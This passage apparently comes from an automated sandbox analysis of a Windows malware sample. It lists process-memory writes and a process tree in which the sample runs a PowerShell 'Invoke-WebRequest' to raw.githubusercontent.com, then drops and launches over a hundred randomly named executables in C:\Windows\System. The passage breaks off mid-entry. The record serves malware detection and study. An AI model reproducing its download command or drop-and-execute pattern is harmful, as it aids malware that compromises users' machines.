PID 3672 wrote to memory of 3980	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	powershell.exe
PID 3672 wrote to memory of 3980	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	powershell.exe
PID 3672 wrote to memory of 344	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	YWnvHnY.exe
PID 3672 wrote to memory of 344	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	YWnvHnY.exe
PID 3672 wrote to memory of 3364	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	BMcJkPi.exe
PID 3672 wrote to memory of 3364	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	BMcJkPi.exe
PID 3672 wrote to memory of 704	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	GWHqASl.exe
PID 3672 wrote to memory of 704	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	GWHqASl.exe
PID 3672 wrote to memory of 1376	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	pZexACs.exe
PID 3672 wrote to memory of 1376	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	pZexACs.exe
PID 3672 wrote to memory of 4640	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	CdrXBrO.exe
PID 3672 wrote to memory of 4640	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	CdrXBrO.exe
PID 3672 wrote to memory of 4396	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	rHjHSHu.exe
PID 3672 wrote to memory of 4396	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	rHjHSHu.exe
PID 3672 wrote to memory of 4364	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	auyJVva.exe
PID 3672 wrote to memory of 4364	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	auyJVva.exe
PID 3672 wrote to memory of 1300	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	kaSFSad.exe
PID 3672 wrote to memory of 1300	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	kaSFSad.exe
PID 3672 wrote to memory of 1276	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	qaYGwrc.exe
PID 3672 wrote to memory of 1276	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	qaYGwrc.exe
PID 3672 wrote to memory of 1748	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	DVqRczz.exe
PID 3672 wrote to memory of 1748	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	DVqRczz.exe
PID 3672 wrote to memory of 1752	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	OCEyheA.exe
PID 3672 wrote to memory of 1752	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	OCEyheA.exe
PID 3672 wrote to memory of 2124	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	wnLylNX.exe
PID 3672 wrote to memory of 2124	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	wnLylNX.exe
PID 3672 wrote to memory of 2636	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	XIEXRcv.exe
PID 3672 wrote to memory of 2636	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	XIEXRcv.exe
PID 3672 wrote to memory of 2388	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	sCVivny.exe
PID 3672 wrote to memory of 2388	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	sCVivny.exe
PID 3672 wrote to memory of 5064	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	CTJhcbE.exe
PID 3672 wrote to memory of 5064	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	CTJhcbE.exe
PID 3672 wrote to memory of 3288	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	vtsGRZH.exe
PID 3672 wrote to memory of 3288	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	vtsGRZH.exe
PID 3672 wrote to memory of 1828	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	HRrIVrF.exe
PID 3672 wrote to memory of 1828	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	HRrIVrF.exe
PID 3672 wrote to memory of 4796	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	BbcnLVg.exe
PID 3672 wrote to memory of 4796	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	BbcnLVg.exe
PID 3672 wrote to memory of 532	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	CNFXofQ.exe
PID 3672 wrote to memory of 532	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	CNFXofQ.exe
PID 3672 wrote to memory of 2816	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	zgtBTxG.exe
PID 3672 wrote to memory of 2816	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	zgtBTxG.exe
PID 3672 wrote to memory of 4072	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	CzyeYXe.exe
PID 3672 wrote to memory of 4072	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	CzyeYXe.exe
PID 3672 wrote to memory of 5076	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	rOZYgWz.exe
PID 3672 wrote to memory of 5076	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	rOZYgWz.exe
PID 3672 wrote to memory of 2324	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	NpEauha.exe
PID 3672 wrote to memory of 2324	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	NpEauha.exe
PID 3672 wrote to memory of 448	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	ftrAVml.exe
PID 3672 wrote to memory of 448	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	ftrAVml.exe
PID 3672 wrote to memory of 2940	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	ENONZnc.exe
PID 3672 wrote to memory of 2940	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	ENONZnc.exe
PID 3672 wrote to memory of 4112	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	ikGhhOj.exe
PID 3672 wrote to memory of 4112	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	ikGhhOj.exe
PID 3672 wrote to memory of 2608	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	jfiGgFz.exe
PID 3672 wrote to memory of 2608	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	jfiGgFz.exe
PID 3672 wrote to memory of 2232	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	GoaDlhA.exe
PID 3672 wrote to memory of 2232	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	GoaDlhA.exe
PID 3672 wrote to memory of 4016	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	xAWYPyu.exe
PID 3672 wrote to memory of 4016	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	xAWYPyu.exe
PID 3672 wrote to memory of 364	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	YPgUwiJ.exe
PID 3672 wrote to memory of 364	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	YPgUwiJ.exe
PID 3672 wrote to memory of 2804	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	NscDEfG.exe
PID 3672 wrote to memory of 2804	3672	5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe	NscDEfG.exe

C:\Users\Admin\AppData\Local\Temp\5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe
"C:\Users\Admin\AppData\Local\Temp\5c7d0ea984012b65efa75a739bfc6d40_NeikiAnalytics.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3672

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3980

C:\Windows\System\YWnvHnY.exe
C:\Windows\System\YWnvHnY.exe
2⤵
- Executes dropped EXE
PID:344

C:\Windows\System\BMcJkPi.exe
C:\Windows\System\BMcJkPi.exe
2⤵
- Executes dropped EXE
PID:3364

C:\Windows\System\GWHqASl.exe
C:\Windows\System\GWHqASl.exe
2⤵
- Executes dropped EXE
PID:704

C:\Windows\System\pZexACs.exe
C:\Windows\System\pZexACs.exe
2⤵
- Executes dropped EXE
PID:1376

C:\Windows\System\CdrXBrO.exe
C:\Windows\System\CdrXBrO.exe
2⤵
- Executes dropped EXE
PID:4640

C:\Windows\System\rHjHSHu.exe
C:\Windows\System\rHjHSHu.exe
2⤵
- Executes dropped EXE
PID:4396

C:\Windows\System\auyJVva.exe
C:\Windows\System\auyJVva.exe
2⤵
- Executes dropped EXE
PID:4364

C:\Windows\System\kaSFSad.exe
C:\Windows\System\kaSFSad.exe
2⤵
- Executes dropped EXE
PID:1300

C:\Windows\System\qaYGwrc.exe
C:\Windows\System\qaYGwrc.exe
2⤵
- Executes dropped EXE
PID:1276

C:\Windows\System\DVqRczz.exe
C:\Windows\System\DVqRczz.exe
2⤵
- Executes dropped EXE
PID:1748

C:\Windows\System\OCEyheA.exe
C:\Windows\System\OCEyheA.exe
2⤵
- Executes dropped EXE
PID:1752

C:\Windows\System\wnLylNX.exe
C:\Windows\System\wnLylNX.exe
2⤵
- Executes dropped EXE
PID:2124

C:\Windows\System\XIEXRcv.exe
C:\Windows\System\XIEXRcv.exe
2⤵
- Executes dropped EXE
PID:2636

C:\Windows\System\sCVivny.exe
C:\Windows\System\sCVivny.exe
2⤵
- Executes dropped EXE
PID:2388

C:\Windows\System\CTJhcbE.exe
C:\Windows\System\CTJhcbE.exe
2⤵
- Executes dropped EXE
PID:5064

C:\Windows\System\vtsGRZH.exe
C:\Windows\System\vtsGRZH.exe
2⤵
- Executes dropped EXE
PID:3288

C:\Windows\System\HRrIVrF.exe
C:\Windows\System\HRrIVrF.exe
2⤵
- Executes dropped EXE
PID:1828

C:\Windows\System\BbcnLVg.exe
C:\Windows\System\BbcnLVg.exe
2⤵
- Executes dropped EXE
PID:4796

C:\Windows\System\CNFXofQ.exe
C:\Windows\System\CNFXofQ.exe
2⤵
- Executes dropped EXE
PID:532

C:\Windows\System\zgtBTxG.exe
C:\Windows\System\zgtBTxG.exe
2⤵
- Executes dropped EXE
PID:2816

C:\Windows\System\CzyeYXe.exe
C:\Windows\System\CzyeYXe.exe
2⤵
- Executes dropped EXE
PID:4072

C:\Windows\System\rOZYgWz.exe
C:\Windows\System\rOZYgWz.exe
2⤵
- Executes dropped EXE
PID:5076

C:\Windows\System\NpEauha.exe
C:\Windows\System\NpEauha.exe
2⤵
- Executes dropped EXE
PID:2324

C:\Windows\System\ftrAVml.exe
C:\Windows\System\ftrAVml.exe
2⤵
- Executes dropped EXE
PID:448

C:\Windows\System\ENONZnc.exe
C:\Windows\System\ENONZnc.exe
2⤵
- Executes dropped EXE
PID:2940

C:\Windows\System\ikGhhOj.exe
C:\Windows\System\ikGhhOj.exe
2⤵
- Executes dropped EXE
PID:4112

C:\Windows\System\jfiGgFz.exe
C:\Windows\System\jfiGgFz.exe
2⤵
- Executes dropped EXE
PID:2608

C:\Windows\System\GoaDlhA.exe
C:\Windows\System\GoaDlhA.exe
2⤵
- Executes dropped EXE
PID:2232

C:\Windows\System\xAWYPyu.exe
C:\Windows\System\xAWYPyu.exe
2⤵
- Executes dropped EXE
PID:4016

C:\Windows\System\YPgUwiJ.exe
C:\Windows\System\YPgUwiJ.exe
2⤵
- Executes dropped EXE
PID:364

C:\Windows\System\NscDEfG.exe
C:\Windows\System\NscDEfG.exe
2⤵
- Executes dropped EXE
PID:2804

C:\Windows\System\wkofbLr.exe
C:\Windows\System\wkofbLr.exe
2⤵
- Executes dropped EXE
PID:1572

C:\Windows\System\BMThVzW.exe
C:\Windows\System\BMThVzW.exe
2⤵
- Executes dropped EXE
PID:4108

C:\Windows\System\DDxuZgt.exe
C:\Windows\System\DDxuZgt.exe
2⤵
- Executes dropped EXE
PID:2720

C:\Windows\System\MdcVemS.exe
C:\Windows\System\MdcVemS.exe
2⤵
- Executes dropped EXE
PID:936

C:\Windows\System\ypLPmBh.exe
C:\Windows\System\ypLPmBh.exe
2⤵
- Executes dropped EXE
PID:4672

C:\Windows\System\djQCbSk.exe
C:\Windows\System\djQCbSk.exe
2⤵
- Executes dropped EXE
PID:1392

C:\Windows\System\MRPoSBI.exe
C:\Windows\System\MRPoSBI.exe
2⤵
- Executes dropped EXE
PID:1968

C:\Windows\System\ClZcxVg.exe
C:\Windows\System\ClZcxVg.exe
2⤵
- Executes dropped EXE
PID:3812

C:\Windows\System\rwWIpBf.exe
C:\Windows\System\rwWIpBf.exe
2⤵
- Executes dropped EXE
PID:4732

C:\Windows\System\hbxMTyy.exe
C:\Windows\System\hbxMTyy.exe
2⤵
- Executes dropped EXE
PID:1348

C:\Windows\System\SHzLJDD.exe
C:\Windows\System\SHzLJDD.exe
2⤵
- Executes dropped EXE
PID:4956

C:\Windows\System\lSQwYfF.exe
C:\Windows\System\lSQwYfF.exe
2⤵
- Executes dropped EXE
PID:1224

C:\Windows\System\JAcAgBe.exe
C:\Windows\System\JAcAgBe.exe
2⤵
- Executes dropped EXE
PID:2108

C:\Windows\System\mTiDmRq.exe
C:\Windows\System\mTiDmRq.exe
2⤵
- Executes dropped EXE
PID:3204

C:\Windows\System\TNZdPxT.exe
C:\Windows\System\TNZdPxT.exe
2⤵
- Executes dropped EXE
PID:1368

C:\Windows\System\abDVGqZ.exe
C:\Windows\System\abDVGqZ.exe
2⤵
- Executes dropped EXE
PID:4864

C:\Windows\System\otcROqm.exe
C:\Windows\System\otcROqm.exe
2⤵
- Executes dropped EXE
PID:2912

C:\Windows\System\iGsXEfR.exe
C:\Windows\System\iGsXEfR.exe
2⤵
- Executes dropped EXE
PID:2624

C:\Windows\System\JTUywQm.exe
C:\Windows\System\JTUywQm.exe
2⤵
- Executes dropped EXE
PID:3056

C:\Windows\System\OLaMHCT.exe
C:\Windows\System\OLaMHCT.exe
2⤵
- Executes dropped EXE
PID:1792

C:\Windows\System\zXLJzim.exe
C:\Windows\System\zXLJzim.exe
2⤵
- Executes dropped EXE
PID:4924

C:\Windows\System\FXgQFbC.exe
C:\Windows\System\FXgQFbC.exe
2⤵
- Executes dropped EXE
PID:2004

C:\Windows\System\NGGvFdr.exe
C:\Windows\System\NGGvFdr.exe
2⤵
- Executes dropped EXE
PID:3416

C:\Windows\System\zNBTPCb.exe
C:\Windows\System\zNBTPCb.exe
2⤵
- Executes dropped EXE
PID:4168

C:\Windows\System\UflApPj.exe
C:\Windows\System\UflApPj.exe
2⤵
- Executes dropped EXE
PID:3096

C:\Windows\System\YymRHba.exe
C:\Windows\System\YymRHba.exe
2⤵
- Executes dropped EXE
PID:4204

C:\Windows\System\hEvJpxt.exe
C:\Windows\System\hEvJpxt.exe
2⤵
- Executes dropped EXE
PID:4480

C:\Windows\System\eQbyOtm.exe
C:\Windows\System\eQbyOtm.exe
2⤵
- Executes dropped EXE
PID:2712

C:\Windows\System\INGKkWw.exe
C:\Windows\System\INGKkWw.exe
2⤵
- Executes dropped EXE
PID:1284

C:\Windows\System\hAixEOx.exe
C:\Windows\System\hAixEOx.exe
2⤵
- Executes dropped EXE
PID:820

C:\Windows\System\uuCmCvx.exe
C:\Windows\System\uuCmCvx.exe
2⤵
- Executes dropped EXE
PID:3028

C:\Windows\System\zXgALmB.exe
C:\Windows\System\zXgALmB.exe
2⤵
- Executes dropped EXE
PID:2000

C:\Windows\System\mKVyQcR.exe
C:\Windows\System\mKVyQcR.exe
2⤵
- Executes dropped EXE
PID:3668

C:\Windows\System\SAWNvuJ.exe
C:\Windows\System\SAWNvuJ.exe
2⤵
PID:4952

C:\Windows\System\FZYPsWk.exe
C:\Windows\System\FZYPsWk.exe
2⤵
PID:3180

C:\Windows\System\pLfbqso.exe
C:\Windows\System\pLfbqso.exe
2⤵
PID:440

C:\Windows\System\InmgYWP.exe
C:\Windows\System\InmgYWP.exe
2⤵
PID:4252

C:\Windows\System\SepQtGQ.exe
C:\Windows\System\SepQtGQ.exe
2⤵
PID:4548

C:\Windows\System\lIWtaBP.exe
C:\Windows\System\lIWtaBP.exe
2⤵
PID:60

C:\Windows\System\RhWMXEP.exe
C:\Windows\System\RhWMXEP.exe
2⤵
PID:2868

C:\Windows\System\wOmMRcb.exe
C:\Windows\System\wOmMRcb.exe
2⤵
PID:3396

C:\Windows\System\iImuSAe.exe
C:\Windows\System\iImuSAe.exe
2⤵
PID:3260

C:\Windows\System\hdvNZPY.exe
C:\Windows\System\hdvNZPY.exe
2⤵
PID:3788

C:\Windows\System\uYZVkdp.exe
C:\Windows\System\uYZVkdp.exe
2⤵
PID:4772

C:\Windows\System\qfybOJm.exe
C:\Windows\System\qfybOJm.exe
2⤵
PID:2676

C:\Windows\System\kgZaQZl.exe
C:\Windows\System\kgZaQZl.exe
2⤵
PID:2008

C:\Windows\System\TOSgbOa.exe
C:\Windows\System\TOSgbOa.exe
2⤵
PID:2376

C:\Windows\System\JsDaRho.exe
C:\Windows\System\JsDaRho.exe
2⤵
PID:2172

C:\Windows\System\aTGJGaO.exe
C:\Windows\System\aTGJGaO.exe
2⤵
PID:5144

C:\Windows\System\bainFoA.exe
C:\Windows\System\bainFoA.exe
2⤵
PID:5164

C:\Windows\System\VLKCVMD.exe
C:\Windows\System\VLKCVMD.exe
2⤵
PID:5208

C:\Windows\System\LMOvCSr.exe
C:\Windows\System\LMOvCSr.exe
2⤵
PID:5228

C:\Windows\System\OjXpILW.exe
C:\Windows\System\OjXpILW.exe
2⤵
PID:5260

C:\Windows\System\yGNjRpk.exe
C:\Windows\System\yGNjRpk.exe
2⤵
PID:5300

C:\Windows\System\SqwLgfK.exe
C:\Windows\System\SqwLgfK.exe
2⤵
PID:5340

C:\Windows\System\WEuJFDa.exe
C:\Windows\System\WEuJFDa.exe
2⤵
PID:5368

C:\Windows\System\AQxgmrl.exe
C:\Windows\System\AQxgmrl.exe
2⤵
PID:5384

C:\Windows\System\PvhaAUO.exe
C:\Windows\System\PvhaAUO.exe
2⤵
PID:5416

C:\Windows\System\VMWKNWR.exe
C:\Windows\System\VMWKNWR.exe
2⤵
PID:5456

C:\Windows\System\FoWXGlG.exe
C:\Windows\System\FoWXGlG.exe
2⤵
PID:5484

C:\Windows\System\bAGZzJH.exe
C:\Windows\System\bAGZzJH.exe
2⤵
PID:5508

C:\Windows\System\aXWXdnW.exe
C:\Windows\System\aXWXdnW.exe
2⤵
PID:5528

C:\Windows\System\jqSrGyO.exe
C:\Windows\System\jqSrGyO.exe
2⤵
PID:5556

C:\Windows\System\KYSImYp.exe
C:\Windows\System\KYSImYp.exe
2⤵
PID:5584

C:\Windows\System\TEgqOPd.exe
C:\Windows\System\TEgqOPd.exe
2⤵
PID:5620

C:\Windows\System\wFspkqW.exe
C:\Windows\System\wFspkqW.exe
2⤵
PID:5648

C:\Windows\System\SFwQUEf.exe
C:\Windows\System\SFwQUEf.exe
2⤵
PID:5672

C:\Windows\System\dPgBcZi.exe
C:\Windows\System\dPgBcZi.exe
2⤵
PID:5716

C:\Windows\System\XrIHEFz.exe
C:\Windows\System\XrIHEFz.exe
2⤵
PID:5736

C:\Windows\System\CfHRUBU.exe
C:\Windows\System\CfHRUBU.exe
2⤵
PID:5752

C:\Windows\System\TwblhcA.exe
C:\Windows\System\TwblhcA.exe
2⤵
PID:5768

C:\Windows\System\EBtKfha.exe
C:\Windows\System\EBtKfha.exe
2⤵
PID:5808

C:\Windows\System\GgRekkK.exe
C:\Windows\System\GgRekkK.exe
2⤵
PID:5852

C:\Windows\System\YfjPtxt.exe
C:\Windows\System\YfjPtxt.exe
2⤵
PID:5876

C:\Windows\System\hllfbua.exe
C:\Windows\System\hllfbua.exe
2⤵
PID:5892

C:\Windows\System\WqexcGd.exe
C:\Windows\System\WqexcGd.exe
2⤵
PID:5920

C:\Windows\System\GGjJSHj.exe
C:\Windows\System\GGjJSHj.exe
2⤵
PID:5948

C:\Windows\System\OXuFFPJ.exe
C:\Windows\System\OXuFFPJ.exe
2⤵
PID:5976

C:\Windows\System\WqObEjp.exe
C:\Windows\System\WqObEjp.exe
2⤵
PID:6004

C:\Windows\System\boHEiMz.exe
C:\Windows\System\boHEiMz.exe
2⤵
PID:6044

C:\Windows\System\BlvRFfy.exe
C:\Windows\System\BlvRFfy.exe
2⤵
PID:6068

C:\Windows\System\OGArHBT.exe
C:\Windows\System\OGArHBT.exe
2⤵
PID:6092

C:\Windows\System\vslYKcG.exe
C:\Windows\System\vslYKcG.exe
2⤵
PID:6120

C:\Windows\System\aRCOxfd.exe
C:\Windows\System\aRCOxfd.exe
2⤵
PID:3916

C:\Windows\System\sGrTzQV.exe
C:\Windows\System\sGrTzQV.exe
2⤵
PID:5220

C:\Windows\System\SckeYkK.exe
C:\Windows\System\SckeYkK.exe
2⤵
PID:1060

C:\Windows\System\yxPskyl.exe
C:\Windows\System\yxPskyl.exe
2⤵
PID:5360

C:\Windows\System\MtGyLCM.exe
C:\Windows\System\MtGyLCM.exe
2⤵
PID:5424

C:\Windows\System\HvavWRP.exe
C:\Windows\System\HvavWRP.exe
2⤵
PID:5492

C:\Windows\System\KBWhzSR.exe
C:\Windows\System\KBWhzSR.exe
2⤵
PID:5540

C:\Windows\System\EiFOHlx.exe
C:\Windows\System\EiFOHlx.exe
2⤵
PID:5596

C:\Windows\System\ILoMxFg.exe
C:\Windows\System\ILoMxFg.exe
2⤵
PID:5680

C:\Windows\System\QuCcqox.exe
C:\Windows\System\QuCcqox.exe
2⤵
PID:5728

C:\Windows\System\RrtjuQx.exe
C:\Windows\System\RrtjuQx.exe
2⤵
PID:5800

C:\Windows\System\DCQpIJC.exe
C:\Windows\System\DCQpIJC.exe
2⤵
PID:5860

C:\Windows\System\BmICkfO.exe
C:\Windows\System\BmICkfO.exe
2⤵
PID:5916

C:\Windows\System\GIelpEZ.exe
C:\Windows\System\GIelpEZ.exe
2⤵
PID:6032

C:\Windows\System\blQQcdl.exe
C:\Windows\System\blQQcdl.exe
2⤵
PID:6100

C:\Windows\System\CHqQasD.exe
C:\Windows\System\CHqQasD.exe
2⤵
PID:2920

C:\Windows\System\RlaarcI.exe
C:\Windows\System\RlaarcI.exe
2⤵
PID:5280

C:\Windows\System\jhemMXU.exe
C:\Windows\System\jhemMXU.exe
2⤵
PID:5404

C:\Windows\System\skxkMQm.exe
C:\Windows\System\skxkMQm.exe
2⤵
PID:5520

C:\Windows\System\WfsrXwq.exe
C:\Windows\System\WfsrXwq.exe
2⤵
PID:5580

C:\Windows\System\nSGGyyW.exe
C:\Windows\System\nSGGyyW.exe
2⤵
PID:5888

C:\Windows\System\CHHNOQa.exe
C:\Windows\System\CHHNOQa.exe
2⤵
PID:6028

C:\Windows\System\tsFZNmS.exe
C:\Windows\System\tsFZNmS.exe
2⤵
PID:6140

C:\Windows\System\gJeGoxZ.exe
C:\Windows\System\gJeGoxZ.exe
2⤵
PID:5464

C:\Windows\System\QhUOBcX.exe
C:\Windows\System\QhUOBcX.exe
2⤵
PID:5568

C:\Windows\System\zyREHus.exe
C:\Windows\System\zyREHus.exe
2⤵
PID:6084

C:\Windows\System\ecwPHYc.exe
C:\Windows\System\ecwPHYc.exe
2⤵
PID:5352

C:\Windows\System\KgnONqp.exe
C:\Windows\System\KgnONqp.exe
2⤵
PID:6172

C:\Windows\System\njtjcvO.exe
C:\Windows\System\njtjcvO.exe
2⤵
PID:6200

C:\Windows\System\rKSWSjE.exe
C:\Windows\System\rKSWSjE.exe
2⤵
PID:6236

C:\Windows\System\FRUhSPS.exe
C:\Windows\System\FRUhSPS.exe
2⤵
PID:6256

C:\Windows\System\ngjvWxX.exe
C:\Windows\System\ngjvWxX.exe
2⤵
PID:6300

C:\Windows\System\GbSUQwK.exe
C:\Windows\System\GbSUQwK.exe
2⤵
PID:6324

C:\Windows\System\hhAOHVH.exe
C:\Windows\System\hhAOHVH.exe
2⤵
PID:6352

C:\Windows\System\WGSyKSq.exe
C:\Windows\System\WGSyKSq.exe
2⤵
PID:6380

C:\Windows\System\dTGFRdE.exe
C:\Windows\System\dTGFRdE.exe
2⤵
PID:6396

C:\Windows\System\bRLbxZd.exe
C:\Windows\System\bRLbxZd.exe
2⤵
PID:6416

C:\Windows\System\CstVzLB.exe
C:\Windows\System\CstVzLB.exe
2⤵
PID:6448

C:\Windows\System\tzouYuh.exe
C:\Windows\System\tzouYuh.exe
2⤵
PID:6480

C:\Windows\System\qdghBNA.exe
C:\Windows\System\qdghBNA.exe
2⤵
PID:6520

C:\Windows\System\UuRNfIS.exe
C:\Windows\System\UuRNfIS.exe
2⤵
PID:6536

C:\Windows\System\ibafWGs.exe
C:\Windows\System\ibafWGs.exe
2⤵
PID:6576

C:\Windows\System\RfTsqaS.exe
C:\Windows\System\RfTsqaS.exe
2⤵
PID:6596

C:\Windows\System\AHEmBas.exe
C:\Windows\System\AHEmBas.exe
2⤵
PID:6620

C:\Windows\System\mesAZht.exe
C:\Windows\System\mesAZht.exe
2⤵
PID:6656

C:\Windows\System\zZFLkeU.exe
C:\Windows\System\zZFLkeU.exe
2⤵
PID:6692

C:\Windows\System\WxgSzFI.exe
C:\Windows\System\WxgSzFI.exe
2⤵
PID:6716

C:\Windows\System\mnhvGbe.exe
C:\Windows\System\mnhvGbe.exe
2⤵
PID:6736

C:\Windows\System\MdZWgCO.exe
C:\Windows\System\MdZWgCO.exe
2⤵
PID:6764

C:\Windows\System\IgmgTOn.exe
C:\Windows\System\IgmgTOn.exe
2⤵
PID:6800

C:\Windows\System\QqDRcSM.exe
C:\Windows\System\QqDRcSM.exe
2⤵
PID:6828

C:\Windows\System\hvQFQHy.exe
C:\Windows\System\hvQFQHy.exe
2⤵
PID:6848

C:\Windows\System\lENDnFu.exe
C:\Windows\System\lENDnFu.exe
2⤵
PID:6872

C:\Windows\System\aJmVllc.exe
C:\Windows\System\aJmVllc.exe
2⤵
PID:6908

C:\Windows\System\vpGWVFC.exe
C:\Windows\System\vpGWVFC.exe
2⤵
PID:6924

C:\Windows\System\IIthdAJ.exe
C:\Windows\System\IIthdAJ.exe
2⤵
PID:6960

C:\Windows\System\YKyOLTA.exe
C:\Windows\System\YKyOLTA.exe
2⤵
PID:7020

C:\Windows\System\TCqhkKS.exe
C:\Windows\System\TCqhkKS.exe
2⤵
PID:7036

C:\Windows\System\ywsEvoL.exe
C:\Windows\System\ywsEvoL.exe
2⤵
PID:7076

C:\Windows\System\ItPxetd.exe
C:\Windows\System\ItPxetd.exe
2⤵
PID:7120

C:\Windows\System\aGzmneF.exe
C:\Windows\System\aGzmneF.exe
2⤵
PID:7144

C:\Windows\System\yOIrbeX.exe
C:\Windows\System\yOIrbeX.exe
2⤵
PID:7164

C:\Windows\System\mwhAPMc.exe
C:\Windows\System\mwhAPMc.exe
2⤵
PID:6180

C:\Windows\System\kZojzXG.exe
C:\Windows\System\kZojzXG.exe
2⤵
PID:6212

C:\Windows\System\nxgmKKU.exe
C:\Windows\System\nxgmKKU.exe
2⤵
PID:6308

C:\Windows\System\kbLtkiC.exe
C:\Windows\System\kbLtkiC.exe
2⤵
PID:6332

C:\Windows\System\faXOKAi.exe
C:\Windows\System\faXOKAi.exe
2⤵
PID:6388

C:\Windows\System\OyXHTpS.exe
C:\Windows\System\OyXHTpS.exe
2⤵
PID:6424

C:\Windows\System\kPHJYeY.exe
C:\Windows\System\kPHJYeY.exe
2⤵
PID:6508

C:\Windows\System\UTyKaPP.exe
C:\Windows\System\UTyKaPP.exe
2⤵
PID:6612

C:\Windows\System\wftNIia.exe
C:\Windows\System\wftNIia.exe
2⤵
PID:6676

C:\Windows\System\ZlAiszG.exe
C:\Windows\System\ZlAiszG.exe
2⤵
PID:6752

C:\Windows\System\wUonErV.exe
C:\Windows\System\wUonErV.exe
2⤵
PID:6836

C:\Windows\System\XmiJVbP.exe
C:\Windows\System\XmiJVbP.exe
2⤵
PID:6864

C:\Windows\System\GvenjgQ.exe
C:\Windows\System\GvenjgQ.exe
2⤵
PID:6956

C:\Windows\System\EhPEwYm.exe
C:\Windows\System\EhPEwYm.exe
2⤵
PID:7028

C:\Windows\System\PgQFBpW.exe
C:\Windows\System\PgQFBpW.exe
2⤵
PID:7128

C:\Windows\System\TzxjcKq.exe
C:\Windows\System\TzxjcKq.exe
2⤵
PID:6160

C:\Windows\System\KIvyCoW.exe
C:\Windows\System\KIvyCoW.exe
2⤵
PID:6248

C:\Windows\System\tRRicgF.exe
C:\Windows\System\tRRicgF.exe
2⤵
